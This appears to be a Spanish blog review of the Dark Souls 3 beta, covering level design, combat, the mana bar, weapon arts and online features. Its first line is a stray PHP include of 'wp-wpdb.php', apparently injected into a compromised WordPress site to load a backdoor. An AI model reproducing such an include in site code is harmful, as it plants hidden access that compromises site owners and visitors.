if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Impresiones de Dark Souls 3 – La Fortaleza de LeChuck

Impresiones de Dark Souls 3

El 3 parece ser el número mágico que ha elegido From Software para su prueba de servidores, 3 días para probar Dark Souls 3 durante 3 horas diarias, y tras 9 horas de beta ¿Cuáles son mis impresiones? En términos generales me ha gustado mucho lo que he probado, sigue mucho la línea de lo visto en los dos juegos anteriores y han cogido varias cosas de otros títulos para mejorar la experiencia de juego, sin duda la vuelta de Miyazaki ha encauzado un poco la saga visto como se desmadró tras Dark Souls 2, y tras haber derrotado al jefe final 8 veces, explorado a fondo todo el mapa y probado todos los personajes, armas y hechizos es oportuno decir que la espera hasta Abril se me va a hacer eterna.

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Nada más empezar a jugar nos encontramos ante una impresionante vista del gran muro de Lothric que será la zona por la que podremos avanzar y eso es algo que me gustó mucho, es de agradecer que se ha recuperado esa sensación de ver todo el mapeado que vamos a poder explorar en las próximas horas nada más entrar a una nueva zona, es una sensación muy parecida a la que tuve al ir por primera vez a Anor Londo y que se persió en Dark Souls 2 debido a su diseño de niveles.

El escenario en sí me ha recordado mucho al castillo de Boletaria del Demon´s Souls y tiene ese toque recargado que se ha visto en Bloodborne con tantos detalles por todas partes, una muy buena combinación la verdad, esperemos que todos los escenarios tengan una personalidad propia y no sean tan parecidos como pasaba en Bloodborne.

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El combate sigue la trayectoria de la saga Souls con pequeñas variaciones que lo hacen más dinámico sin llegar al dinamismo de Bloodborne, no es de extrañar teniendo en cuenta que el en los Dark Souls el peso del equipo es algo extremadamente importante y que en Bloodborne llevaras lo que llevases te seguías moviendo igual de rápido, en mi opinión deberían haber usado ese tipo de agilidad para los personajes que apenas lleven pes, como los asesinos o arqueros, para darle más importancia al peso y premiar con una mayor velocidad a aquellos que sacrifican su defensa por agilidad.

Algo que me sorprendió mucho es que la barra de maná ha vuelto, y como pasaba en el Demon´s Souls servirá para determinar la cantidad de veces que podremos lanzar los conjuros, cada uno tiene un coste diferente en función de su potencia por lo que habrá que usar los hechizos más poderosos con algo más cautela, esperemos que la regulen mejor que en el Demon’s y no hagan a los magos invencibles.

Además de para la magia y conjuros, esta barra también sirve para usar los movimientos especiales de las armas y personajes, también conocidos como weapon arts, que se activan al pulsar el gatillo izquierdo del mando, cada arma dará un efecto diferente, el mago con el catalizador por ejemplo nos da una mejora de daño a las armas como si la imbuyéramos en magia mientras que la espada con el caballero nos da unas opciones de ataque con los botones derechos diferentes a las normales, algo muy interesante la verdad.

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Los escudos por otra parte han cambiado ligeramente, ahora estos tendrán un pequeño símbolo que determina en que está especializado, los escudos pequeños que se usaban habitualmente para parrys ahora se indican con un pequeño círculo y en el caso de que te permitan usar las weapon arts sin necesidad de usar el arma a dos manos el escudo aparecerá con un símbolo de una pequeña espada. No tengo muy claro que repercusión tendrá esto en el juego final, pero por lo que he podido probar no hay un cambio realmente significativo, son símbolos más informativos que otra cosa ya que la dinámica de los escudos sigue igual.

Y por si alguno se está preguntando la forma de rellenar la barra de maná ahora tenemos, además del famoso frasco de estus, otro frasco azul que funciona de la misma manera solo que nos recarga el maná en vez de la salud, dentro de la beta cada tipo de personaje tenía un numero distinto de frascos, no se sabe aún si al elegir personaje en el juego final variará la cantidad de frascos disponibles, pero es de suponer que se podrán ampliar para no limitar la clase del personaje creo yo, la saga Souls siempre ha apostado por la variedad, esperemos que ahora no los limiten.

Otro de los cambios más significativos que me he encontrado es que ya no hay humanidades, o al menos no en esta beta, la estética no es de un hueco y a pesar de morir varias veces nuestro aspecto no cambia, pero lo curioso es que en este estado no podemos invocar a ningún otro jugador, la única opción que tenemos de invocar a alguien es al consumir un extraño objeto llamado Ember (ascua o ceniza en español) mediante el cual se nos alarga la barra de vida y nos da un aspecto de estar ardiendo.

Dado que Dark Souls 3 tiene que ver con los señores de la ceniza, que son aquellos que enlazan la llama en cada ciclo, es muy posible que estos fragmentos sean una pequeña parte de su poder y que los necesitemos para contactar con otros jugadores, en esencia actúan de forma muy similar a las humanidades pero el hecho de no ser un hueco da que pensar ya que la maldición de los no muertos no se ha roto.

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En cuanto al componente online se puede ver que sigue los pasos de Dark Souls 2, podremos invocar hasta 3 jugadores adicionales para poder hacer frente a los peligros de cada zona como se vio en la versión Scholar of the First Sin, por otra parte también conserva algo de Bloodborne que tuvo mucho éxito, el sistema de contraseñas para poder invocar o ser invocado solo por amigos, los que hayáis jugado en cooperativo a los Dark Souls anteriores sabréis lo difícil que era coincidir con un amigo si no escondíais vuestras señales de invocación en los lugares más enrevesados del mapa, aunque también hay que decir que eso tenía su encanto.

En cuanto a las invasiones algo que me pareció curioso, pero que por desgracia solo vi un par de veces, fue que ahora es posible que más de un jugador pueda invadirte al mismo tiempo, veo lógico que siendo 4 puedan invadirte 2 personas para que no lo tengan tan difícil, aunque espero que siendo solo 1 no puedan invadirte 2 jugadores, si el juego ya es frustrante de por si esto le sacará de sus casillas a más de uno.

En esencia Dark Souls 3 sigue conservando la personalidad tan característica de la saga con ligeros cambios en los que no funcionaba y una vuelta de tuerca a lo que si lo hacía, veremos en que queda la cosa ya que aún hay tiempo para cambiar o mejorar ciertas cosas y teniendo en cuenta que en la demo presentada en la Gamescon no había barra de maná es de suponer que lo que hemos visto este fin de semana pasado no será el producto final.

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